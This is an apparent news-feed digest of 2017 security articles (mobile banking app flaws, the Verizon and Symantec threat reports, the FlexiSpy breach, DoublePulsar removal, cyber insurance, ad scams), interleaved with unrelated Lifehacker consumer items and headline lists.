Abstract: This paper studies emerging technologies for tracking reading behaviors ("reading analytics") and their implications for reader privacy, attempting to place them in a historical context. It discusses what data is being collected, to whom it is available, and how it might be used by various interested parties (including authors). I explore means of tracking what's being read, who is doing the reading, and how readers discover what they read. The paper includes two case studies: mass-market e-books (both directly acquired by readers and mediated by libraries) and scholarly journals (usually mediated by academic libraries); in the latter case I also provide examples of the implications of various authentication, authorization and access management practices on reader privacy. While legal issues are touched upon, the focus is generally pragmatic, emphasizing technology and marketplace practices. The article illustrates the way reader privacy concerns are shifting from government to commercial surveillance, and the interactions between government and the private sector in this area. The paper emphasizes U.S.-based developments.
from Schneier on Security http://ift.tt/2poQhaQ
How secure are mobile banking apps?
Do banking institutions have a good handle on the things they need to remediate and new control layers they need to adopt to keep users secure?
To answer those questions, Accenture and NowSecure have performed vulnerability assessments of customer-facing mobile banking apps of 15 banking institutions in the North American market.
They have tested the iOS and Android app versions of each of these banks, and found that every app they tested had at least one security issue.
“Of the 465 tests completed for banking apps running on Android, 44 or nine percent had low security issues; 48 or 10 percent had medium security issues; and 10 or two percent had high level security issues. For banking apps running on iOS, a total of 315 tests indicated 24 or eight percent low level security issues; 13 or four percent with medium level issues; and none with high level issues,” they noted.
Security risks
Among the security risks identified were:
- World-writable files (i.e. other apps can have write access to the files)
- Broken SSL check / sensitive data in transit (i.e. unencrypted communications). Curiously enough, none of the tested iOS apps had this problem
- Writable executables – a failing that can be combined with other issues and lead to additional app vulnerabilities, including remote code execution ones.
- Lack of obfuscation of the app source code, allowing for easy reverse-engineering (some 60% of the tested Android banking apps are guilty of this)
- Weak SecureRandom implementation
- Dynamic code loading
- Inappropriately set “HttpOnly” flag (to prevent XSS attacks)
- Inappropriately set “Secure” flag (to prevent the sending of cookies over insecure channels)
- TLS traffic with sensitive data (80% of tested iOS banking apps had sensitive values intercepted while proxying SSL and Transport Layer Security (TLS) app communications (i.e. username, password, GPS coordinates, etc.)
- Lack of app transport security (60% of tested iOS banking apps had ATS globally disabled, which allows a connection regardless of HTTP or HTTPS configuration, connection to servers with lower TLS versions and a connection using cipher suites that do not support forward secrecy).
Based on this and other historical app security assessments, the researchers have concluded that banking institutions have been proactive when it came to remediating well-known critical security issues such as Heartbleed, MITM exposure and others, but less so in regards to the above noted security risks.
Many of the institutions have also introduced multi-factor authentication for online banking (a good step), but chose to leverage SMS technology to deliver authentication codes (inherently insecure choice).
Top security risks identified in vulnerability assessment
Tips for mitigating mobile banking security risks
The researchers have flagged insecure communication as the biggest risk.
Security around the transfer of data across communication channels is a challenge for developers, they noted, pointing out that developers are placing too much confidence in secure end-user behavior and back-end server-side communications.
“Development teams should strive to embed security within the end-to-end mobile SDLC (Systems Development Life Cycle), with proper security governance and oversight supported by recurring developer training and awareness and testing,” the concluded.
“Organizations should also have a strategy for performing regular vulnerability and/or configuration assessments, complemented by penetration testing, app fuzzing, and source code reviews, to obtain a comprehensive understanding of the mobile security environment across the entire mobile deployment stack.”
from Help Net Security http://ift.tt/2pp6sFg
Executive spotlight: iovation’s new Vice President of Product
Last week iovation announced that Dwayne Melancon was leaving Tripwire after 17 years and joining the company as the new Vice President of Product, so we decided to get in touch and see what are his future plans.
“My experience at Tripwire ran the gamut – I served in a range of roles, from CTO to product management to head of R&D – but my ultimate goal was to create products that offered both a streamlined user experience and market-leading security protection,” he told us.
This experience will be invaluable, he notes, as iovation shifts from a single product to a portfolio of solutions.
“I’ve spent years working with boards and senior executives, and my philosophy is one of connecting risk and risk mitigation to the entire business, including the boardroom. I plan to work closely with our entire executive team to navigate the convergence of fraud and authentication and guide development of products that connect these two markets,” he added.
“This is a team sport, and the board is part of the winning team in an effective organization. This applies outside of iovation, as well – I’ll take advantage of my experience with C-level executives to work with our customers to help them understand risk in the context of their businesses, and to take business-aligned steps to counteract that risk. After all, the shape of a company’s security investment should match the shape of its risk.”
Infosec innovation
Few areas in IT have grown and evolved as quickly as security in the past few years.
“While all of iovation’s executives are driven by the same mission – to make the internet a safer place for people to do business – VPs in the product space need to not only keep up with the industry but see things ahead of the curve. We need to be able to anticipate trends and create products that satisfy needs that our customers may not even be aware of,” Melancon points out.
The thing with innovation is that it’s viewed through the “eyes of the beholder” and that makes it a challenge for product executives.
“Fortunately, I find that the best way to hit the mark is to consume a lot of data, both on what is happening from a technology perspective, and from connecting with a lot of customers to identify trends in their needs and challenges. My habit is to meet with hundreds of customers each year, and to leverage the data that’s available through community, partnerships, and public information sharing to provide the best opportunity to identify innovation that will connect with customers’ ideas and expectations of value,” he says.
Another important facet is agility – information security changes quickly, and that means solutions providers need to experiment, iterate, and improve continuously. For that, a unique combination of consistency and flexibility is required.
Reducing friction
Yet another challenge is tied to meeting the demands of today’s fast-paced threat landscape. Hackers and fraudsters have become amazingly sophisticated, and they’re able to quickly pivot and adjust course when fraud prevention solutions succeed. They have also become quite good at sharing information with each other, so they can help each other evade the good guys.
“Our biggest challenge is how to continue to outsmart these would-be fraudsters without impacting the user experience. Companies whose products both prevent fraud and reduce user friction for consumers will establish themselves as leaders of the pack — which is why I chose to come to iovation now,” Melancon shared.
“The company is uniting fraud prevention, authentication and a streamlined user experience in a way that’s never been done, and I’m really excited about the opportunity to bridge those competing worlds with unique SaaS-based solutions.”
And, when if comes to information sharing, iovation fights fire with fire – they are leveraging a long-standing community of customers who share information about what the bad guys are doing, so the good guys can stay one step ahead. “That’s unique in the fraud and authentication world,” he concludes.
from Help Net Security http://ift.tt/2qhWLFF
Know your enemy: Defining the new taxonomy of malicious emails
Just as it is the default tool for most businesses, email’s capacity for rapid, mass communication has made it a favourite instrument of criminals. As a result, malicious emails have become a common occurrence in most consumer and business inboxes. Although chances are that most people will correctly identify the most common malicious emails as fraudulent, many will fail to correctly identify sophisticated email attacks as unsafe. Familiarity can breed contempt, and all users are now at risk from increasingly more advanced email attacks, which have become vastly more sophisticated in the last few years.
There have been dozens of recent high-profile thefts and data breaches suffered by organisations that were triggered by malicious emails, with a recent example seeing two multi-national tech companies being stung for more than $100m by a fraudster impersonating a supplier. Both companies were repeatedly fooled by fake invoices, which saw funds wired into shell accounts dotted around the world.
Despite the wide awareness of these high-profile attacks, which leveraged identity deception to trick the intended victims, it is still common for users to have a complacent view of malicious emails, with many people still thinking back to the quaintly inept fraud attempts like the classic Nigerian scam. In addition, even when the threat is addressed, it is often oversimplified. People simply lump all malicious emails together under the label of “phishing” while ignoring the varied tactics used by attackers and the different threats that each type of attack represents. This oversimplification unnecessarily puts people at risk, as it commonly results in a focus on addressing only a portion of the real problem.
In the business world, a lack of awareness of the different types of threats can lead to enterprises focusing in the wrong direction, and on the wrong things. This leaves them vulnerable as they invest money in solutions that won’t protect them from sophisticated attacks that leverage techniques such as identity deception, or which target their victims using custom content. In order to properly protect their employees and customers, companies need to have a thorough understanding of the different attacks, the threats they represent and how they can be prevented.
A phish by any other name
Although phishing has become a catch-all phrase for email-based cyber attacks, the term specifically relates to attempts to trick victims into giving up log-in credentials by impersonating a known and trusted entity, such as a consumer brand or governmental authority. These attacks usually target tens of thousands of potential victims at once, to compensate for the relatively low success rate associated with non-targeted attacks.
Although attackers have traditionally taken a “quantity over quality” approach, we have seen some increasingly sophisticated examples more recently, where attacks have been highly tailored to their intended victims, and subsequently been much more successful. In these more sophisticated attacks, attackers will often enhance their deception with tactics including a spoofed email address, a look-alike-domain or a false identity in the “from field” of the email, and sometimes use obfuscation methods, such as substitutions of letters with identical-looking characters of foreign languages, to evade automated content-based detection methods.
While education can go some way to helping users identify these fakes, a better option is to prevent them from reaching their targets in the first place. Brands and organisations can prevent their own emails from being impersonated with the use of a DMARC (Domain-based Message Authentication, Reporting and Conformance) policy. This protocol is designed to detect and prevent emails from being spoofed by enabling ISPs (Internet Service Providers) to check that incoming mail is authorised by the domain name it is using.
A highly-engineered threat
From an enterprise perspective, a much greater threat is posed by the targeted attacks sometimes referred to as “spear phishing”. In contrast to the type of email attacks explained above, these sophisticated attacks involve emails that are sent to a smaller set of intended victims, with content that has been crafted for high-value targets.
In most cases, these attacks commonly assume the guise of a specific individual who is trusted by the recipient, requesting an action such as a wire transfer or access to confidential information. In the enterprise environment, an attack impersonating a known contact has come to be known as Business Email Compromise (BEC), also frequently referred to as CEO Fraud, as chief execs are one of the most popular identities to assume. BEC attacks carry even more weight, as an email from a senior executive will have most employees scrambling to comply. There have also been several notable cases where the attacker has instead impersonated a supplier or customer.
Whatever the specific methodology, BEC attacks include a high level of social engineering, with attackers researching the company, targeted employee, and relevant connections to manufacture a convincing identity and narrative.
With these attacks, the fraudsters will request confidential data, such as HR records or customer details, but may also seek to directly trick targets into paying into a bank account. In the guise of a CEO, the attacker will usually create a sense of urgency and a reason why they cannot be contacted for normal procedure. In the guise of a partner or supplier, fake invoices can be sent, causing payments to be made to the criminal.
These attacks are particularly dangerous because the traditional email defences that companies have come to rely on over the last decade are almost entirely useless. Most filters rely on indicators of malicious payloads, such as attachments or links, and without these factors there is nothing to distinguish a well-crafted fake email from the genuine article.
Alongside tricking targets into giving up information, email has also become the preferred vector for malware attacks, including the now notorious ransomware. Malware attacks increasingly share traits with BEC attacks, impersonating a senior or trusted authority to trick their target into downloading a file or clicking a link. Once the victim has done this, their machine – and potentially the entire network – will swiftly be compromised. Sophisticated attackers use crypters and other obfuscation tools to circumvent traditional defenses of malicious payloads.
Multi-layered defence
The more one understands malicious emails, the more he or she will realise there is no single catch-all solution that will halt all threats. Instead, firms will need to invest in a multi-layered approach to identify and block attacks. Traditional security and spam filters will continue to play a role in handling the almost endless wave of mass emails, but more sophisticated attacks must be met with equal sophistication. Combining content filtering with the ability to identify and authenticate senders based on their domains will go a long way to keeping a company safe from all level of threats. By understanding the threats against them, businesses can ensure they have the right combination of defences to protect their employees, customers and their brand.
from Help Net Security http://ift.tt/2qadvCA
Cybercrime can come in any shape or size, and not always the form you’d expect
Cyberespionage is now the most common type of attack seen in manufacturing, the public sector and now education, warns the Verizon 2017 Data Breach Investigations Report. Much of this is due to the high proliferation of propriety research, prototypes and confidential personal data, which are hot-ticket items for cybercriminals.
Nearly 2,000 breaches were analyzed in this year’s report and more than 300 were espionage-related, many of which started life as phishing emails.
In addition, organized criminal groups escalated their use of ransomware to extort money from victims: this year’s report sees a 50 percent increase in ransomware attacks compared to last year. Despite this increase and the related media coverage surrounding the use of ransomware, many organizations still rely on out-of-date security solutions and aren’t investing in security precautions. In essence, they’re opting to pay a ransom demand rather than to invest in security services that could mitigate against a cyberattack.
Malware is big business
Fifty-one percent of data breaches analyzed involved malware. Ransomware rose to the fifth most common specific malware variety. Ransomware – using technology to extort money from victims – saw a 50 percent increase from last year’s report, and a huge jump from the 2014 DBIR where it ranked 22 in the types of malware used.
Phishing is still a go-to technique
In the 2016 DBIR, Verizon flagged the growing use of phishing techniques linked to software installation on a user’s device. In this year’s report, 95 percent of phishing attacks follow this process. Forty-three percent of data breaches utilized phishing, and the method is used in both cyber-espionage and financially motivated attacks.
Pretexting is on the rise
Pretexting is another tactic on the increase, and the 2017 DBIR showed that it is predominantly targeted at financial department employees – the ones who hold the keys to money transfers. Email was the top communication vector, accounting for 88 percent of financial pretexting incidents, with phone communications in second place with just under 10 percent.
“Cyber-attacks targeting the human factor are still a major issue,” says Bryan Sartin, executive director, Global Security Services, Verizon Enterprise Solutions. “Cybercriminals concentrate on four key drivers of human behavior to encourage individuals to disclose information: eagerness, distraction, curiosity and uncertainty. And as our report shows, it is working, with a significant increase in both phishing and pretexting this year.”
Business sector insights give real-life customer intelligence
This year’s report provides tailored insights for key business sectors, revealing specific challenges faced by different verticals, and also answering the “who? what? why? and how?” for each. Key sector-specific findings include:
- The top three industries for data breaches are financial services (24 percent); healthcare (15 percent) and the public sector (12 percent).
- Companies in the manufacturing industry are the most common targets for email-based malware.
- Sixty-eight (68) percent of healthcare threat actors are internal to the organization.
“The cybercrime data for each industry varies dramatically,” comments Sartin. “It is only by understanding the fundamental workings of each vertical that you can appreciate the cybersecurity challenges they face and recommend appropriate actions.”
Get the basics in place
With 81 percent of hacking-related breaches leveraging either stolen passwords and/or weak or guessable passwords, getting the basics right is as important as ever before. Some recommendations for organizations and individuals alike include:
- Stay vigilant – log files and change management systems can give you early warning of a breach.
- Make people your first line of defense – train staff to spot the warning signs.
- Keep data on a “need to know” basis – only employees that need access to systems to do their jobs should have it.
- Patch promptly – this could guard against many attacks.
- Encrypt sensitive data – make your data next to useless if it is stolen.
- Use two-factor authentication – this can limit the damage that can be done with lost or stolen credentials.
- Don’t forget physical security – not all data theft happens online.
from Help Net Security http://ift.tt/2oyYZEg
Wednesday, April 26, 2017
Modern threat landscape: Seismic shifts in motivation and focus
Cybercriminals revealed new levels of ambition in 2016 – a year marked by extraordinary attacks, including multi-million dollar virtual bank heists and overt attempts to disrupt the U.S. electoral process by state-sponsored groups, according to Symantec’s Internet Security Threat Report (ISTR), Volume 22.
“New sophistication and innovation are the nature of the threat landscape, but this year Symantec has identified seismic shifts in motivation and focus,” said Kevin Haley, director, Symantec Security Response. “The world saw specific nation states double down on political manipulation and straight sabotage. Meanwhile, cyber criminals caused unprecedented levels of disruption by focusing their exploits on relatively simple IT tools and cloud services.”
Subversion and sabotage attacks emerge at the forefront
Cybercriminals are executing politically devastating attacks in a move to undermine a new class of targets. Cyber attacks against the U.S. Democratic Party and the subsequent leak of stolen information reflect a trend toward criminals employing highly-publicized, overt campaigns designed to destabilize and disrupt targeted organizations and countries.
While cyber attacks involving sabotage have traditionally been quite rare, the perceived success of several campaigns – including the U.S. election and Shamoon – point to a growing trend to criminals attempting to influence politics and sow discord in other countries.
Nation states chase the big scores
A new breed of attackers revealed major financial ambitions, which may be an exercise to help fund other covert and subversive activities. Today, the largest heists are carried out virtually, with billions of dollars stolen by cybercriminals. While some of these attacks are the work of organized criminal gangs, for the first time nation states appear to be involved as well. Symantec uncovered evidence linking North Korea to attacks on banks in Bangladesh, Vietnam, Ecuador and Poland.
“This was an incredibly audacious hack as well as the first time we observed strong indications of nation state involvement in financial cybercrime,” said Kevin Haley, director, Symantec Security Response. “While their sights were set even higher, the attackers stole at least US$94 million.”
Attackers weaponize commonly used software
In 2016, Symantec saw cybercriminals use PowerShell, a common scripting language installed on PCs, and Microsoft Office files as weapons. While system administrators may use these common IT tools for daily management tasks, cybercriminals increasingly used this combination for their campaigns as it leaves a lighter footprint and offers the ability to hide in plain sight. Due to the widespread use of PowerShell by attackers, 95 percent of PowerShell files seen by Symantec in the wild were malicious.
The use of email as an infection point also rose, becoming a weapon of choice for cyber criminals and a dangerous threat to users. Symantec found one in 131 emails contained a malicious link or attachment – the highest rate in five years. Further, BEC scams, which rely on little more than carefully composed spear-phishing emails – scammed more than three billion dollars from businesses over the last three years, targeting over 400 businesses every day.
Caving in to digital extortion
Ransomware continued to escalate as a global problem and a lucrative business for criminals. Symantec identified over 100 new malware families released into the wild, more than triple the amount seen previously, and a 36 percent increase in ransomware attacks worldwide.
However, the United States is firmly in the crosshairs of attackers as the number-one targeted country. Symantec found 64 percent of American ransomware victims are willing to pay a ransom, compared to 34 percent globally. Unfortunately, this has consequences. In 2016, the average ransom spiked 266 percent with criminals demanding an average of $1,077 per victim up from $294 as reported for the previous year.
Cracks in the cloud
A growing reliance on cloud services has left organizations open to attacks. Tens of thousands of cloud databases from a single provider were hijacked and held for ransom in 2016 after users left outdated databases open on the internet without authentication turned on.
Cloud security continues to challenge CIOs. According to Symantec data, CIOs have lost track of how many cloud apps are used inside their organizations. When asked, most assume their organizations use up to 40 cloud apps when in reality the number nears 1,000. This disparity can lead to a lack of policies and procedures for how employees access cloud services, which in turn makes cloud apps riskier. These cracks found in the cloud are taking shape. Symantec predicts that unless CIOs get a firmer grip on the cloud apps used inside their organizations, they will see a shift in how threats enter their environment.
from Help Net Security http://ift.tt/2qadWws
Deadspin A Running List Of ESPN Layoffs | The Muse Isn’t It Relevant That the Star of The Handmaid’s
Deadspin A Running List Of ESPN Layoffs | The Muse Isn’t It Relevant That the Star of The Handmaid’s Tale Belongs to a Secretive, Allegedly Oppressive Religion? | Fusion ICE Just Unveiled Its Chilling New Anti-Immigrant Hotline | The Root Ohio Teen Couple Commits Suicide Within Days of Each Other |
from Lifehacker http://ift.tt/2oxTENo
Make Iced Coffee, Sans Ice, With HyperChiller
Qu’est-ce que c’est?
As I’ve said many times, iced coffee is a brilliant way to sell people ice for the price of coffee (which is mostly water to begin with). Cold brew on the other hand is a different process that results in less acidity, among other benefits. The HyperChiller might not make cold brew, but it’s dead simple and works with the brewing gear you already own to rapidly chill your coffee.
Advertisement
Advertisement
You can pour or brew your coffee (or alcohol) directly into the HyperChiller, which surrounds your beverage of choice with ice-filled stainless steel. This process drops the temperature of your drink by more than 130 degrees in under a minute. No dilution. No effort. No coffee shop markup. Dishwasher safe.
Want to make cold brew? That’s easy too:
from Lifehacker http://ift.tt/2pb5ryp
Google Home Will Now Read Cooking Directions Out Loud
When it comes to home voice assistants, there’s no denying that the bulk of their usage comes in the kitchen for setting timers and playing audio. Google’s taking that to the next logical step with Google Home, which can now read recipes out loud.
Advertisement
Here’s how it works:
- Pick a recipe using the Google Assistant on Android or Google Search (which is now just called Google) app (on iOS or Android).
- Tap the “Send to Google Home” button when you find a recipe you want to make.
- When you’re ready to start cooking, say, “Ok Google, start cooking.”
- When you’re ready for the next step, say, “Ok Google, what’s step two,” or if you need to repeat something, say, “Ok Google, repeat.”
The idea here is pretty great, but it’s hard to tell how well it’ll actually work in real time. It’s also a bit frustrating that you can only send recipes using Google’s own apps, which limits your selection and it doesn’t appears there’s any means to actually save and recall any recipes. Either way, it’s still a step in an interesting direction. As with all Google things, this will be rolling out over the next week or so, so if it’s not working for you right now, try it again later.
Advertisement
Now we’re cooking — the Assistant on Google Home is your secret ingredient | Google
from Lifehacker http://ift.tt/2p4nHuF
Hackers explain how they “owned” FlexiSpy
How did the hackers that go by the name Decepticons breach stalkerware manufacturer FlexiSpy?
According to information purportedly provided by the attackers themselves, it took them a while to thoroughly “own” the company’s networks and wreak as much havoc as possible, but it was ultimately not that difficult.
What is FlexiSpy?
FlexiSpy is a piece of spyware that can be deployed on a variety of devices running Windows, macOS, iOS and Android.
It can record calls, steal application passwords, listen in on chats effected via popular social networking and instant messaging apps, monitor the victim’s web surfing, snap pictures with the device’s camera, send fake SMSes, track the device’s location, and more.
The company says it is meant to help parents keep an eye on children and employers on employees, but analysis of the documents stolen by the hackers revealed that the company has been also marketing the spyware to people who wanted to monitor their significant other’s online activities and digital communications.
The attackers’ motivation
Motherboard reporters talked to “Leopard Boy”, a member of the Decepticons, and another anonymous hacker that has breached American company Retina-X at practically the same time the Decepticons went after FlexiSpy. (Retina-X develops and sells PhoneSheriff, another piece of consumer surveillance software).
Both said that the thing they wanted to achieve with their destructive breaches is to put the companies out of business.
The FlexiSpy hack
The Decepticons published a step-by-step overview of how they hit the company.
They started by enumerating the company’s IP space with Fierce, and among the results they found a subdomain hosting an admin panel.
They tried to perform SQL injection on it, but failed. Then they tried some common default credential combinations and struck gold. Once inside, they managed to enumerate and extract info on the company’s customers.
Then they set out to find servers and websites run by the company, and found SSH servers, a Microsoft Exchange server, a CRM instance, etc. They also found a software repository, a Mailchimp API key, and a password that allowed them to compromise an administrator account on the CRM instance, from which they proxied onto the FlexiSpy’s internal network and began scanning for open ports.
They say that they’ve managed to compromise the company’s NAS servers, servers that contained source code backups abd backups of “home directories, HR documents, corporate files, some SSH keys, password backups, internal network diagrams.”
They accessed and compromised the Domain Controller for all of the Windows domains, the internal SharePoint server, and started exfiltrating every kind of information and code they could – then handed much of it over to Motherboard reporters.
Then they set on destroying and wiping everything: the company’s RAID devices, NAS devices, Rackspace servers, Amazon S3 buckets of backups. And finally, they said that they have redirected the company’s domains to Privacy International and hijacked a couple of their Twitter accounts.
“We’ve stolen every a great deal of source code, going back years. We are hoping that signatures are going to be distributed, tools written to identify and remove infections, and we also hope that people will see that this industry is really out there, is worth money, and that it’s terribly, terribly evil,” they concluded.
The company’s domains are now back online, and the company did not confirm or deny the breach. Instead, it only apologized to users about a “temporary technical issue affecting the portal” on April 18, and announced a “Hacker Reward Program” on April 24.
Similarly, Retina-X did not mention a breach to its customers, and apparently instructed its staff to say that a hardware failure was behind a recent outage that prevented customers from logging into their accounts.
from Help Net Security http://ift.tt/2oJBtQ9
Deadspin ESPN Officially Announces Layoffs, Says Very Little Else | Jezebel Serena Williams Says Her
Deadspin ESPN Officially Announces Layoffs, Says Very Little Else | Jezebel Serena Williams Says Her Pregnancy Announcement Was a Social Media Slip | The Root What’s Up With Oprah And Homophobic Preachers? | Fusion Charlotte Cops Think This Video Showing Officers Threatening to Kill an Unarmed Man Is Just Fine |
from Lifehacker http://ift.tt/2oM2uTK
Script for remote DoublePulsar backdoor removal available
NSA’s DoublePulsar backdoor can now be remotely uninstalled from any infected Windows machine, thanks to the updated detection script provided by security firm Countercept.
“The SMB version [of the script] also supports the remote uninstall of the implant for remediation, which was helped by knowledge of the opcode mechanism reversed by @zerosum0x0,” the company explained.
It’s good to note, though, that using it to “clean” machines you don’t own is not advised, as it’s technically against the law in most countries to tamper with other people’s computers. Still, it can come in hand to administrators that are tasked with checking and securing a considerable number of systems.
Also, it’s good to remember that removing the backdoor is as easy as restarting the infected machine, although that won’t prevent it from being infected again in the same way as before. Installing the patch provided by Microsoft in March will help.
Microsoft’s reaction
According to Ars Technica, Microsoft is still not convinced that the number of machines implanted with DoublePulsar is as big as it has been reported – i.e. in the tens of thousands.
And that number seems to keep rising, as script kiddies and more knowledgeable cyber criminals are taking advantage of the NSA attacks tools and exploits leaked by the Shadow Brokers, and the “tutorials, taken from security researchers, on how to utilize the exploits and the Equation Groups‘s self-developed framework, called Fuzzbunch.”
EternalBlue, the exploit used to deliver DoublePulsar, is capable of penetrating machines running unpatched Windows XP through 2008 R2 by exploiting vulnerabilities in Microsoft Windows SMB Server.
“Customers with up-to-date software are protected from this malware, which requires an already-compromised machine to run,” Microsoft stated. “We encourage customers to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers.”
from Help Net Security http://ift.tt/2ovQpWK
Analyzing Cyber Insurance Policies
There's a really interesting new paper analyzing over 100 different cyber insurance policies. From the abstract:
In this research paper, we seek to answer fundamental questions concerning the current state of the cyber insurance market. Specifically, by collecting over 100 full insurance policies, we examine the composition and variation across three primary components: The coverage and exclusions of first and third party losses which define what is and is not covered; The security application questionnaires which are used to help assess an applicant's security posture; and the rate schedules which define the algorithms used to compute premiums.
Overall, our research shows a much greater consistency among loss coverage and exclusions of insurance policies than is often assumed. For example, after examining only 5 policies, all coverage topics were identified, while it took only 13 policies to capture all exclusion topics. However, while each policy may include commonly covered losses or exclusions, there was often additional language further describing exceptions, conditions, or limits to the coverage. The application questionnaires provide insights into the security technologies and management practices that are (and are not) examined by carriers. For example, our analysis identified four main topic areas: Organizational, Technical, Policies and Procedures, and Legal and Compliance. Despite these sometimes lengthy questionnaires, however, there still appeared to be relevant gaps. For instance, information about the security posture of third-party service and supply chain providers and are notoriously difficult to assess properly (despite numerous breaches occurring from such compromise).
In regard to the rate schedules, we found a surprising variation in the sophistication of the equations and metrics used to price premiums. Many policies examined used a very simple, flat rate pricing (based simply on expected loss), while others incorporated more parameters such as the firm's asset value (or firm revenue), or standard insurance metrics (e.g. limits, retention, coinsurance), and industry type. More sophisticated policies also included information specific information security controls and practices as collected from the security questionnaires. By examining these components of insurance contracts, we hope to provide the first-ever insights into how insurance carriers understand and price cyber risks.
from Schneier on Security http://ift.tt/2qdHLsn
NoTrove threat actor delivering millions of scam ads
Researchers at RiskIQ have identified NoTrove, a threat actor that is delivering millions of scam ads that threaten consumers and further undermine the digital advertising industry. NoTrove was so effective that one of his pages ranked as one of the internet’s most visited pages for one day.
Earliest observed instance of NoTrove
The online ad scams work by serving up attractive but disingenuous ads on legitimate websites. The ads might offer bogus surveys or free software upgrades, as examples. When someone clicks on the ad, however, the scammer’s software then re-directs the user’s “clicks” and traffic toward various locations across the Internet.
Since advertisers and web content providers want as much of the traffic pie as they can get, web traffic is an essential commodity. Ad scammers like NoTrove profit from this demand, participating in traffic affiliate programs or selling traffic to traffic buyers (brokers). Unfortunately for the digital advertisers, however, the users are negatively impacted. They are surprised by the ad they are seeing and don’t even know how they got it.
Equally troubling for the digital advertising industry is that as ad scammers increase, the likelihood consumers will implement ad blockers as a way to avoid bogus ads increases as well. This practice, according to Juniper Research, will cost the digital media industry over $27 billion by 2020.
For consumers, this is more than just a nuisance. Ad scams can also be used to download PUPs—potentially unwanted programs—and can redirect them to unwanted places.
How NoTrove works
- To stay ahead of efforts to block its fake ads, NoTrove uses automation to constantly change how the ads are delivered and clickthroughs re-routed.
- The scam master has burned through 2,000 randomly generated domains and more than 3,000 IPs, operating across millions of Fully Qualified Domain Names; an FQDN is a complete web address, typically including subdomains for ad scammers, such as ajee99.mycontent.example.com.
- RiskIQ observed 78 variants of NoTrove campaigns, such as scam survey rewards, fake software downloads, and redirections to PUPs.
- Alexa rankings for its domains show how effective NoTrove is; even though each domain is short-lived, the rankings often shoot up into the Alexa top 10,000 based purely on scam ad deliveries; one NoTrove domain reached the ranking of 517, making it one of the most visited pages on the entire internet for that day.
“NoTrove harms not only visiting users, but also legitimate advertisers, adversely affecting those reliant on the credibility of the digital advertising ecosystem, such as online retailers, publishers and networks,” said William MacArthur, a threat researcher at RiskIQ. “Constantly shifting infrastructure means simply blocking domains and IPs isn’t enough. We must now begin utilizing machine learning to leverage human security teams who increasingly depend on accurate, automated scam detection.”
from Help Net Security http://ift.tt/2ovhzgu